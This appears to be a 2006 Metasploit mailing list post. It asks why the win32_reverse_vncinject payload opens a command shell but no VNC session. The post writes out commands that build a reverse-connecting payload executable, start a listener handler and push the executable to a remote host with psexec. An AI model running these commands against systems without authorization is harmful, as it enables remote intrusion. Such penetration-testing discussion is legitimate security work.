Metasploit mailing list archives

msfpayload win32_reverse_vncinject ... X

From: sigtrap at sigtrap.org (Sigtrap)
Date: Fri, 27 Jan 2006 15:10:11 +0100 (CET)

Hi,
I try to use the win32_reverse_vncinject payload as an EXE to launch it with "psexec -c \\host vnc_pl.exe" to get a
remote desktop on a remote computer that I have administrator access to.

As (some copied from HD Moore):
1) Generate an executable:
$ msfpayload win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 X > vnc_pl.exe

2) Start up the Framework with the payload_handler exploit module:
$ msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 E

3) Start the vnc_pl.exe on a remote klient (tried both Windows 2000 and XP):
c:\> psexec -c \\host vnc_pl.exe

vnc_pl.exe connects back and the DLL is transfered and launched. The shell (CMD.EXE) pops up and the error occurs. No
VNC server is started.
Tacks for your help
//Sigtrap